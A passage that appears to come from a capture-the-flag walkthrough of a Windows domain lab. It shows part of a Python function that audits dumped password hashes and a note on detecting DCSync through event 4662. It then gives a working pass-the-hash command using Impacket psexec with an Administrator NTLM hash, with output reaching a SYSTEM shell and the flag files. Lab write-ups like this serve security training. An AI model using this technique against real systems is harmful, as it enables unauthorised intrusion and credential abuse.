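    """Flag blank passwords, stored LM hashes, and NT hashes shared by several user accounts."""
    findings = {"blank_password": [], "lm_hash_present": [], "shared_nt_hash": []}
    by_nt = defaultdict(list)
    for r in parse_dump(text):
        if r["nt"] == EMPTY_NT:
            findings["blank_password"].append(r["name"])
        if r["lm"] != EMPTY_LM:
            findings["lm_hash_present"].append(r["name"])
        if not r["name"].endswith("$"):  # machine accounts have random passwords; skip them
            by_nt[r["nt"]].append(r["name"])
    for nt, names in by_nt.items():
        if len(names) > 1 and nt != EMPTY_NT:
            findings["shared_nt_hash"].append(sorted(names))
    return findings
```

The DCSync that produced such a dump is itself visible on the DC as event 4662 from an account that is not a domain controller, with the DS-Replication-Get-Changes-All control access right ({1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}) in the Properties field.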
With that I can move onto the target via pass-the-hash:
$ ./psexec.py Administrator@10.10.10.103 -hashes aad3b435b51404eeaad3b435b51404ee:f6b7160bfc91823792e0ac3a162c9267 -no-pass
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[*] Requesting shares on 10.10.10.103.....
[*] Found writable share ADMIN$
[*] Uploading file hoFhbszJ.exe
[*] Opening SVCManager on 10.10.10.103.....
[*] Creating service YMDn on 10.10.10.103.....
[*] Starting service YMDn.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32>
I have user.txt:
C:\Users\mrlky\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is 9C78-BB37
Directory of C:\Users\mrlky\Desktop
07/10/2018 06:24 PM <DIR> .
07/10/2018 06:24 PM <DIR> ..
04/23/2022 02:36 AM 34 user.txt
1 File(s) 34 bytes
2 Dir(s) 14,616,612,864 bytes free
C:\Users\mrlky\Desktop> type user.txt
And root.txt as well:
C:\Users\administrator> cd desktop
C:\Users\administrator\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is 9C78-BB37
Directory of C:\Users\administrator\Desktop
02/11/2021 08:29 AM <DIR> .
02/11/2021 08:29 AM <DIR> ..
04/23/2022 02:36 AM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 14,616,563,712 bytes free
C:\Users\administrator\Desktop> type root.txt